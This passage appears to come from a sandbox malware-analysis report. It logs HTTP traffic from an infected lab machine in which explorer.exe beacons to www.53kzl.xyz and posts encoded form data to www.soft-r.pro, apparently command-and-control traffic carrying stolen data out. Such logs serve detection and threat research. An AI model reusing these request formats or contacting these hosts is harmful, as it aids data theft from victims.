63 6c 42 51 66 63 65 55 56 58 32 39 66 64 55 6e 34 30 43 6e 49 41 7a 59 47 62 4c 49 55 7a 6f 72 6c 75 72 61 32 33 6e 6a 32 Data Ascii: tVw=s2QEZCpv(CLYWCoR6-fdeDagbWeJcukgEa~3RbkyMxfLE3nxK3zIYqw4AlRT(9ot7ZtVdmgYJF7c0-oNhpxIxJP90-LxJNMpVMu_5yCmfB20KD~YMTXrP1KIODUTdrQ3HZAZIDGenTXcObM-fmP4cMzoc4Ta(R(rW796xAACQImKb0FvgtyOBE9nDCwozEdjXkKyx6zlkogC7Fbb8tstckog7f042JEQZ2g_rLvdSpV1rCL8DaT7WbWlW9Xlb4JyKkffxyS5gppLnMMdO0pazuj27x5vXsTf~h(0(TBhTfmQTTiGN_7CgaVaZMiFDN2HOb4KZiZzqC4ysvTX4tYh(nrf1ExGtpXJTNeo7wJ4DdT_q9KGvtrMafAc3UZGkkDFMd7oABSoMf~SHw(kO3XObd5i~3oDNRYU20n7E36thPcTzvc6hMoyW7OuWAl8oP26KRlLKwDxmIBpaIWSBUEBvooOvlFYrwNiy3ckTFZjS54oTpByvT~kNM5njHimEDSON512d5UDhFRKkxCMEFlaBwH9PnVCbdpPgkyXdlrBMoVaCE0ZJH4DQNh3iEnqcc(VKl4fxhyWMDX1WY602lk6otsSQZpA55cBBywELMX5isGB9JT-i9ssnKWO7xWH899qc087bfe8zgjRpxSnjUy-eB4zGo37B-f_Yzf6miWYNJDBaPH9iJfJ951REv6NdU5CfzVgHCRsptE9E1AegrwP0H~-fNlE0kn7tuy-5V7ZhV15NgaP39Ei8AD1U8(DXKckuZ5oDQaYWNyOnzpZAlWrn-6GsxaJx7YWGd0w7zlw75geLxv7mM(9krywtQxQfsyqkGrPL9jZGAjKdsZ3hwdfTVctNlIcvTPso-FJnElGwngcrIhLBODwYujsWqMgBzF2VKE96nENOpI_cwcwWqBU41EBGunUmn8zRaognc40xjk_tNup17rUnQqYmN(FcNDJ1pCrZrGLK1~3edZIOjrYYAxPDgbE78kAJOU1~5hcboL9yx68YV4Wt71UJLWWbNP9D9dk1KRGiyTi(Tng9Oy17IfaUQRVihLIWU~JN4fFCTs9bwi6fUcWj5TaPgp-xekmqq8gCdxqBEM8SXjQfex39h5Ti72yU2Gf9YBO9gvg5nMk~Ocs47FdPzDVrQ8_dK~_8KFNNpZXdysxbb7_2uxu8uH33w7io9ss6k8Fq9xpGRaKEHwaacyoscFlq-I_~JpGWwSxExOop35j7FW21Xh056K5(_Hnb15BL1TCOS~5VZZArro4ihiveW4nIQMtqdAm5IjTN-rT0sEbgeaB5pwNnW4hNU0CQWGF9xAbHkclBQfceUVX29fdUn40CnIAzYGbLIUzorlura23nj2sX4arrNC8usWAyfdWcfXj30U2xck51MC_Ws2LqnMcDe2pEWYKi1zMuobqHlGw1NFyqBeS~HIf1lZtVX~6NxiiTY2wKVnFkDP2K-zhzem8wu32dpRa15qk6Mm8hkFmuh3INgaFOHJr4izdJTo0IomcaDfjDPeS8K6FYVT8r2ScqXvlYixOPjkiXJh9yp(4rsVTrs9IrRvjXJNlydEKqnMlvZW070ffjJyHYO6yQ8JfI2Vzg6Y0O13q6pZ_NloXta9BJSO0KMC_6H5Tlh32ttlzxMERsExmXEC8z4xUVDWL1LdBYU353CdsC391H_ruYt4uhucTr5SSVB1hj13pUhP0gdOu8Jk_5tRROQu0Y_ouxMlAO8mcadXqMEEU1wniveKBLShfGZCOP2hxb-GB90voSB8P3lvmsiAJQkKixrAS6gmbAy9nGeFQIwhoHKXb4rOcRz9odWp-t_1DV320vYuo4fWnbfXoLz38ahlp7PXm~bpSzMDtYH8KMQlht-pkW01rPbbCy3myXQeu0U1XTSgXVlkvcRQgTTtxRSI3dHV_XoxiMODZm8im(LCsYkL8LgJju8qbKk9nwuDv6n4dORqiarqx3UmFt41GmESHi3y6Xe4S5KtqbOJ4eGyCVVvKY4qaUR0ZAJN96y2D4bC2LLJ_7fz8LwOJijVbezQq~o(ura(WzTKh0goJs7AOFpfLCF9pvlXxm_ASPOjXmQ38LvacyHcpvO5KGBaeVWp1xD(3BJIkIQfiEqPS6FywsN2vSg9kCUfKjzP8sZuS7pnhZQC4pmEB5CZCUdyuIxcGa1WoT69THeiJOZDtFz1UFTeY5kLnLUSrcOgVWDQUe4birXPGYqrmzIDJYRJ745ES1EWawmEDF4aESPB0bKr9y2kwpa2PaNmQXknHMT1BNTGRwmlplobDn2Xs57uHWR2oxtsBRYJ-~NAi5iJEazRHMVa7gr3wxGvZwg1-3dKb(qAIYk~MzvFWqMOnldKmgxCRUX0h1cuv5n(DrAQ94p4bbQiyjHNs05EfCmyqCpHJYRFSPwUQWG4olYdzkcuwL78Yka5vwS3xQqGdi_vRyRMzSMFgqwA0VIhD4l9v5dGzbbkOAMqncYJCeGuD~_c2wktmjr6Noqgy~YmxROlsJMrgR7nYNj60I6(S7Gcp(HC2722CIGFqV_jV4zFUR70L38H7TqZ48gvMiayZEaWdfNwrRQGm670_~oiqRmq56YU_MKs_a1~L(jRCJjHHFpUnKW9N7XweTaoVVpvrAoabQcyT7J17MebMTkjQaD(UvXcs1cuf2xnlR6ttO6czGWa4ATcnmMXsZV3m9StM2MbpIPJUoIafnp05A_OjK2HHFSLuANNmJZXmBlZeapclyN9QIwphWU1Q1XDglau42uDDxel0GGNrxrZYjk~QfLts9Txr2IZy~UaURZebsaQ0hvEomW9zl6Tqis3Y(ieHuP8fM5l5NxOli6lSPzIFKBkGT5mcSMZtM9LLtMF7c_e4JoMYC1TbqIpIKt8oudvo~_QCUrMEsJNYel9tpWlojQZtI5bwh7yR2XHNQabuWoulADWNKNQD0RgLj83HkN7KSLk9fAPwDCL3~XRO02CcbT2KsFYIgRB9CRacpV7HyUguz4Xym2aL5HbiipX1xCOXUc3HsnWVH1wZ7_bXyVeBfd5o90cPI1Wo64I-X6QGOGDwpzOsH-(eJnv6zewpy7496nmR~-DCyzkUSFq5kc(SpINJEvLHjbf0yVSXOscqXSC7ghxia1h2xfFHqGfOrJ0bwY075AlS3QbWG2TLdu8Tj3JT6tqflqpBa93eKiFd4qFjyqfT70EDFWutN-R7QbDLFIaAclPxzm~zzQ8s5yKSq5FtROYKmt(xBQrnNQUkI6lbrSO8EsoFiDpOZfBomMaLxRFC4fYc9RU5awR58XiufXpVbuy8DLMTmUtYe9RZyDe8DjV_t4V4B_pbRvmywKhqEoULIYzDXhpNStA9E3gjUHrzPUpCw4N4BnZxE19LuLIqm9klDldINm1ye-Ycyu26btTngPb41V2ntHBTQyfaeuhHEbuf727-COpr1iBnrs4fs1uEPJ2LXBoEDf9gcBAr9Rhmg7jsBnGD8CMcM9y3~oxSyziHBJGvIIHFpS6DE4htudwwjLESb17nfgHc7NU9OklA6HTCWnlKFQKIIoUYrMBsjG4vSJYeSo9rTj7N7RIufWy3JxR97Qurwei3YejepHrUenWVewnz4KsntCMRNfNGpkYAmbrUUcridZ1aVg~tm9dW5vcNcHoVxQUPwe(DSokZyu8MbPr29ZQPE1ccKXpastFwKli46ORvs8GXuCtSLIeVXW13m5jkbHkWZThcab131ZflwTha8R~4yFZP2XZSPxldve(dTclvLLgzEqOd1duBVoX30MMiQsb48CB9DiDqCAG0Sb5vGPeqMmIP9IkGTThKtjCniYy0Q7SrT90OKi26GjUyex2L26d_jOCKZ2o_LSViznViHAzEmPX34-ksYX3xx-ThpKwECIq7KHrkJ26CNqBQPYp2ArK96sed9tHp0Tl6q8xV5qPFioTi0Tz71nxJ77DupJ3VJ7mLLL1EIJovYUf0j2QXOTX54lA4(BthUQpw4CLoBtXz~3XzvBBs6bjQeey4xpWO0NVFRepT6v0Mh0wwUBEa3xhOFF(8qu4gx1G0~TlTv_RQv3WV2FFtMxSJRIvcYpSIE9tSg1Lv9dr22a
Oct 16, 2022 05:30:55.842765093 CEST	135	IN	HTTP/1.1 405 Not Allowed Server: nginx/1.20.2 Date: Sun, 16 Oct 2022 03:30:55 GMT Content-Type: text/html Content-Length: 157 Via: 1.1 google Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49702	35.241.57.73	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 16, 2022 05:30:57.590800047 CEST	136	OUT	GET /dj6o/?tVw=h04kayJb3ljXRQcX7vvRWSjXbEa8Wdd7FpeJSrMka0q/M3vTEVv/IaMbJiFl7sx9hbZGfk4FCy3OyfUPlJlZw4D92suLIakcOQ==&7n9pqx=K2Mp5pqx32_lRZL HTTP/1.1 Host: www.53kzl.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 16, 2022 05:30:57.900973082 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Sun, 16 Oct 2022 03:30:57 GMT Content-Type: text/html Content-Length: 5248 Last-Modified: Wed, 24 Aug 2022 10:00:55 GMT Vary: Accept-Encoding ETag: "6305f6d7-1480" Cache-Control: no-cache Accept-Ranges: bytes Via: 1.1 google Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 77 70 6b 52 65 70 6f 72 74 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 67 6c 6f 62 61 6c 65 72 72 6f 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 77 70 6b 52 65 70 6f 72 74 65 72 26 26 28 77 69 6e 64 6f 77 2e 77 70 6b 3d 6e 65 77 20 77 69 6e 64 6f 77 2e 77 70 6b 52 65 70 6f 72 74 65 72 28 7b 62 69 64 3a 22 62 65 72 67 2d 64 6f 77 6e 6c 6f 61 64 22 2c 72 65 6c 3a 22 32 2e 33 34 2e 30 22 2c 73 61 6d 70 6c 65 52 61 74 65 3a 31 2c 70 6c 75 67 69 6e 73 3a 5b 5b 77 69 6e 64 6f 77 2e 77 70 6b 67 6c 6f 62 61 6c 65 72 72 6f 72 50 6c 75 67 69 6e 2c 7b 6a 73 45 72 72 3a 21 30 2c 6a 73 45 72 72 53 61 6d 70 6c 65 52 61 74 65 3a 31 2c 72 65 73 45 72 72 3a 21 30 2c 72 65 73 45 72 72 53 61 6d 70 6c 65 52 61 74 65 3a 31 7d 5d 2c 5b 77 69 6e 64 6f 77 2e 77 70 6b 70 65 72 66 6f 72 6d 61 6e 63 65 50 6c 75 67 69 6e 2c 7b 65 6e 61 62 6c 65 3a 21 30 2c 73 61 6d 70 6c 65 52 61 74 65 3a 2e 35 7d 5d 5d 7d 29 2c 77 69 6e 64 6f 77 2e 77 70 6b 2e 69 6e 73 74 61 6c 6c 28 29 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 6c 6f 61 64 42 61 69 64 75 48 6d 74 28 74 29 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 e7 99 be e5 ba a6 e7 bb 9f e8 ae a1 22 2c 74 29 3b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 65 2e 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 22 2b 74 3b 76 61 72 20 6f 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 6f 29 7d 66 75 6e 63 74 69 6f 6e Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js" crossorigin="true"></script><script>window.wpkReporter&&(window.wpk=new window.wpkReporter({bid:"berg-download",rel:"2.34.0",sampleRate:1,plugins:[[window.wpkglobalerrorPlugin,{jsErr:!0,jsErrSampleRate:1,resErr:!0,resErrSampleRate:1}],[window.wpkperformancePlugin,{enable:!0,sampleRate:.5}]]}),window.wpk.install())</script><script>function loadBaiduHmt(t){console.log("",t);var e=document.createElement("script");e.src="https://hm.baidu.com/hm.js?"+t;var o=document.getElementsByTagName("script")[0];o.parentNode.insertBefore(e,o)}function
Oct 16, 2022 05:30:57.901040077 CEST	138	IN	Data Raw: 20 62 61 69 64 75 50 75 73 68 28 74 2c 65 2c 6f 29 7b 77 69 6e 64 6f 77 2e 5f 68 6d 74 2e 70 75 73 68 28 5b 22 5f 74 72 61 63 6b 45 76 65 6e 74 22 2c 74 2c 65 2c 6f 5d 29 7d 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 e5 8a a0 e8 bd bd e7 99 be e5 ba Data Ascii: baiduPush(t,e,o){window._hmt.push(["_trackEvent",t,e,o])}console.log("..."),window._hmt=window._hmt\|\|[];const BUILD_ENV="quark",token="42296466acbd6a1e84224ab1433a06cc";loadBaiduHmt(token)</script><script>function send
Oct 16, 2022 05:30:57.901082993 CEST	140	IN	Data Raw: 28 69 29 26 26 74 2e 70 75 73 68 28 22 22 2e 63 6f 6e 63 61 74 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 69 29 2c 22 3d 22 29 2e 63 6f 6e 63 61 74 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 61 5b 69 5d 29 29 29 Data Ascii: (i)&&t.push("".concat(encodeURIComponent(i),"=").concat(encodeURIComponent(a[i])));var c=t.join("&").replace(/%20/g,"+"),s="".concat("https://track.uc.cn/collect","?").concat(c,"&").concat("uc_param_str=dsfrpfvedncpssntnwbipreimeutsv");(o()\|\|r
Oct 16, 2022 05:30:57.901138067 CEST	140	IN	Data Raw: 4c 69 73 74 3d 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 7c 7c 22 3f 22 29 2e 73 75 62 73 74 72 69 6e 67 28 31 29 2e 73 70 6c 69 74 28 22 26 22 29 2c 6c 65 6e 3d 71 73 4c 69 73 74 2e 6c 65 6e 67 74 68 2c 69 3d 30 3b 69 Data Ascii: List=(window.location.search\|\|"?").substring(1).split("&"),len=qsList.length,i=0;i<len;i++){var e=qsList[i];if("debug=true"===e){var $head=document.getElementsByTagName("head")[0],$script1=document.createElement("script");$script1.setAttribute
Oct 16, 2022 05:30:57.915240049 CEST	141	IN	Data Raw: 6f 72 69 67 69 6e 22 2c 22 61 6e 6f 6e 79 6d 6f 75 73 22 29 2c 24 73 63 72 69 70 74 31 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 2f 2f 69 6d 61 67 65 2e 75 63 2e 63 6e 2f 73 2f 75 61 65 2f 67 2f 30 31 2f 77 65 6c 66 61 72 65 Data Ascii: origin","anonymous"),$script1.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/vconsole.min-3.3.0.js"),$head.insertBefore($script1,$head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("cro
Oct 16, 2022 05:30:57.915291071 CEST	142	IN	Data Raw: 86 e9 a2 91 e5 ad 98 e5 85 a5 e7 bd 91 e7 9b 98 e9 9a 8f e6 97 b6 e7 9c 8b 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 61 67 65 2e 75 63 2e 63 6e 2f 73 2f 75 61 65 2f 67 2f 33 6f 2f 62 Data Ascii: </div></div><script src="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.b0a57cbbe8efd7017472.js"></script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49703	194.58.112.174	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 16, 2022 05:31:03.111426115 CEST	143	OUT	POST /dj6o/ HTTP/1.1 Host: www.soft-r.pro Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.soft-r.pro User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.soft-r.pro/dj6o/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 74 56 77 3d 69 6c 70 57 37 57 44 61 5a 63 6e 62 33 66 77 53 72 64 72 5f 62 50 38 30 75 64 51 71 54 66 78 6a 6e 64 6c 32 78 56 56 56 61 4a 44 6c 68 61 74 66 6d 4c 67 67 37 49 61 4d 28 44 4c 77 7a 5f 63 41 46 33 76 47 41 55 43 34 72 54 39 32 58 36 35 35 70 62 7a 36 54 78 64 6e 65 68 78 32 32 31 4c 55 50 76 4b 78 43 63 49 49 55 5f 70 63 73 32 55 67 61 35 6b 6a 61 53 54 56 64 58 42 6d 42 48 69 77 51 76 76 56 38 41 64 75 74 65 63 68 32 41 4f 53 75 48 66 76 4b 39 75 70 61 71 4b 4e 4b 34 5a 62 43 50 79 76 52 66 28 70 5a 5f 66 54 57 42 54 34 6e 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: tVw=ilpW7WDaZcnb3fwSrdr_bP80udQqTfxjndl2xVVVaJDlhatfmLgg7IaM(DLwz_cAF3vGAUC4rT92X655pbz6Txdnehx221LUPvKxCcIIU_pcs2Uga5kjaSTVdXBmBHiwQvvV8Adutech2AOSuHfvK9upaqKNK4ZbCPyvRf(pZ_fTWBT4ng).
Oct 16, 2022 05:31:03.169050932 CEST	143	IN	HTTP/1.1 302 Moved Temporarily Server: nginx Date: Sun, 16 Oct 2022 03:31:03 GMT Content-Type: text/html Content-Length: 154 Connection: close Location: http://soft-r.pro/dj6o/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49704	194.58.112.174	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 16, 2022 05:31:05.192785978 CEST	149	OUT	POST /dj6o/ HTTP/1.1 Host: www.soft-r.pro Connection: close Content-Length: 5333 Cache-Control: no-cache Origin: http://www.soft-r.pro User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.soft-r.pro/dj6o/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 74 56 77 3d 69 6c 70 57 37 57 44 61 5a 63 6e 62 31 38 6f 53 6e 63 72 5f 63 76 39 47 6c 39 51 71 64 5f 77 71 6e 64 70 32 78 55 67 4e 61 5f 7a 6c 68 4a 56 66 6d 6f 49 67 39 49 61 4d 35 44 4c 30 73 76 63 57 46 33 53 33 41 52 6d 6f 72 56 74 32 52 6f 42 35 72 37 7a 31 61 78 64 6d 64 68 78 31 35 56 4c 55 50 76 57 4c 43 59 64 39 55 2d 52 63 73 6b 63 67 61 36 41 67 62 43 54 55 43 48 42 6d 42 48 6d 4a 51 76 76 46 38 41 31 2d 74 65 38 68 31 79 57 53 69 79 7a 67 4e 74 75 69 54 4b 4c 38 5a 72 49 45 49 34 71 63 54 5f 48 67 53 71 32 67 61 45 36 71 28 57 6a 4e 6f 71 38 69 66 6c 57 31 6c 58 78 56 6d 67 4d 59 7a 79 50 5f 51 61 77 42 54 6e 6b 4e 53 71 48 45 4b 51 75 62 78 56 4a 2d 7a 63 36 78 32 47 6a 37 71 35 5a 70 4e 72 35 77 32 36 52 6d 52 68 41 55 55 34 30 32 35 56 55 66 62 30 5a 6a 74 73 77 51 30 71 7a 71 67 4e 51 62 4f 37 32 55 59 50 55 31 73 6e 47 68 6e 71 64 49 48 6c 72 78 30 6b 63 38 39 70 7e 59 41 6f 28 4e 5a 4d 37 57 59 69 4c 31 62 4d 30 49 4d 4a 43 77 54 42 7e 5f 70 61 57 32 32 50 31 54 6d 38 30 32 76 6e 67 61 73 45 63 38 77 33 4a 65 49 35 47 54 64 55 4b 39 63 77 33 76 6e 52 72 51 4e 36 7a 70 78 38 7e 76 6a 71 70 48 42 69 72 69 73 62 59 4e 4c 75 76 52 61 6a 67 33 4f 56 6b 47 6c 59 51 4b 62 65 4c 48 38 50 68 52 44 70 6d 61 57 4f 4f 64 65 79 59 49 79 64 57 66 7e 6d 76 77 59 50 37 38 67 31 31 2d 6d 67 7a 54 42 35 43 44 49 69 79 43 43 63 4e 72 37 4f 49 57 57 32 70 51 44 37 33 72 4a 51 68 33 4a 42 77 48 52 5f 49 77 6d 6f 7e 67 78 56 62 4e 58 6f 6a 52 58 75 69 78 65 6a 35 47 67 54 45 70 32 63 35 65 4e 4d 75 50 6c 36 70 45 43 6f 66 59 57 4e 56 6b 69 56 46 36 37 61 74 70 67 34 48 76 54 7a 7a 63 33 56 52 74 38 48 7a 4c 50 4d 76 6d 79 6b 6f 77 59 72 59 72 71 7a 4d 62 67 46 64 47 56 52 72 53 62 31 46 4f 6f 33 76 34 77 33 43 69 79 44 5a 31 6a 69 4f 74 4a 55 38 34 55 35 4f 68 62 6f 50 67 54 63 7e 6a 59 57 39 6d 42 45 35 4e 4e 52 48 6e 69 53 68 32 42 51 7a 54 6d 62 65 5a 52 74 57 70 66 53 7a 58 6a 72 68 45 5a 33 41 4a 47 4a 56 49 74 72 4d 56 34 45 31 53 58 32 6a 71 50 65 6a 59 48 62 73 35 55 50 7a 46 6c 78 34 4a 30 6b 63 5f 4d 4f 28 57 41 50 44 36 6f 4f 55 72 5a 39 48 6d 79 4f 65 37 35 64 4c 68 56 76 47 64 32 56 36 37 6d 4d 64 55 50 4e 63 49 38 38 6c 77 70 63 74 78 6f 48 6f 33 33 5a 49 5f 68 5f 66 57 7e 76 50 31 71 65 7a 46 73 57 28 44 55 61 68 32 35 4a 6f 4d 6b 62 65 71 71 45 4f 6c 71 61 6b 76 7a 4a 41 67 46 41 58 49 28 73 50 67 4e 4a 52 4d 43 46 74 2d 34 6e 48 48 66 41 48 79 54 75 52 4e 6c 74 65 50 5a 73 32 4b 71 79 36 46 38 32 34 74 6d 73 4b 36 72 37 67 62 69 33 4a 35 48 4e 52 67 42 33 50 79 48 75 49 35 42 61 34 30 44 39 7e 6e 75 4c 69 76 33 50 47 73 36 55 47 45 6a 6c 61 64 56 61 28 79 75 47 50 41 34 74 75 61 73 51 72 57 75 49 4b 64 4e 73 63 67 75 33 46 6c 56 45 35 6a 59 78 57 6c 57 4e 67 33 50 30 5a 4d 34 41 75 4b 75 6e 28 79 44 61 4f 57 69 6a 30 42 34 35 59 56 32 69 4c 7a 48 5a 28 72 71 57 78 45 42 79 78 65 45 78 6a 69 35 69 39 6a 74 30 6e 42 4e 55 75 6d 30 6b 49 30 47 4c 45 56 6d 5a 75 34 57 53 41 6a 4d 49 35 54 71 4f 28 62 30 4a 64 51 50 79 76 62 36 2d 4e 48 33 70 36 41 46 4e 49 6d 45 70 79 44 31 71 35 6f 4f 2d 55 71 6f 7a 61 6f 57 72 54 67 67 65 61 61 6a 64 7a 30 71 35 33 74 35 54 6b 6b 7e 4b 33 48 48 34 59 49 4e 52 49 37 58 4e 72 30 64 6a 35 46 66 38 68 58 7a 74 38 72 6b 67 73 4c 57 6c 78 77 6d 49 42 39 44 38 79 7a 4d 74 64 76 4c 72 55 6b 52 4f 4d 4b 36 62 56 73 7a 6f 50 33 53 35 63 54 31 68 30 69 69 73 74 57 59 66 33 65 35 36 6d 6f 39 30 7a 56 75 75 51 53 6c 59 56 74 66 5a 6f 57 6a 66 50 44 65 54 53 47 70 51 52 6a 50 44 42 69 45 39 68 52 45 73 7a 65 41 76 65 49 44 6d 61 6a 50 49 4e 4d 4a 52 75 6b 79 78 33 48 41 76 69 79 4b 49 53 62 68 6d 37 61 61 53 32 68 58 55 4b 63 50 56 4c 4b 79 51 71 33 73 49 6e 39 5a 4f 31 52 4f 75 30 41 30 45 50 72 32 51 31 34 45 44 75 61 33 6f 72 54 30 7a 74 55 72 68 67 38 45 6f 35 49 7a 71 76 46 78 4c 63 65 45 68 59 38 67 69 39 4e 67 65 53 4a 66 4f 53 45 34 74 51 6c 59 46 57 48 57 63 70 79 6e 64 64 70 4f 6b 30 74 69 57 67 58 28 76 35 41 41 57 57 54 73 63 55 70 48 67 64 32 31 33 35 7a 6c 37 46 41 48 47 63 44 45 7a 77 38 4c 45 66 35 7e 66 4d 61 72 66 56 74 6f 70 6b 33 4d 41 36 73 69 71 42 4d 33 32 33 Data Ascii: tVw=ilpW7WDaZcnb18oSncr_cv9Gl9Qqd_wqndp2xUgNa_zlhJVfmoIg9IaM5DL0svcWF3S3ARmorVt2RoB5r7z1axdmdhx15VLUPvWLCYd9U-Rcskcga6AgbCTUCHBmBHmJQvvF8A1-te8h1yWSiyzgNtuiTKL8ZrIEI4qcT_HgSq2gaE6q(WjNoq8iflW1lXxVmgMYzyP_QawBTnkNSqHEKQubxVJ-zc6x2Gj7q5ZpNr5w26RmRhAUU4025VUfb0ZjtswQ0qzqgNQbO72UYPU1snGhnqdIHlrx0kc89p~YAo(NZM7WYiL1bM0IMJCwTB~_paW22P1Tm802vngasEc8w3JeI5GTdUK9cw3vnRrQN6zpx8~vjqpHBirisbYNLuvRajg3OVkGlYQKbeLH8PhRDpmaWOOdeyYIydWf~mvwYP78g11-mgzTB5CDIiyCCcNr7OIWW2pQD73rJQh3JBwHR_Iwmo~gxVbNXojRXuixej5GgTEp2c5eNMuPl6pECofYWNVkiVF67atpg4HvTzzc3VRt8HzLPMvmykowYrYrqzMbgFdGVRrSb1FOo3v4w3CiyDZ1jiOtJU84U5OhboPgTc~jYW9mBE5NNRHniSh2BQzTmbeZRtWpfSzXjrhEZ3AJGJVItrMV4E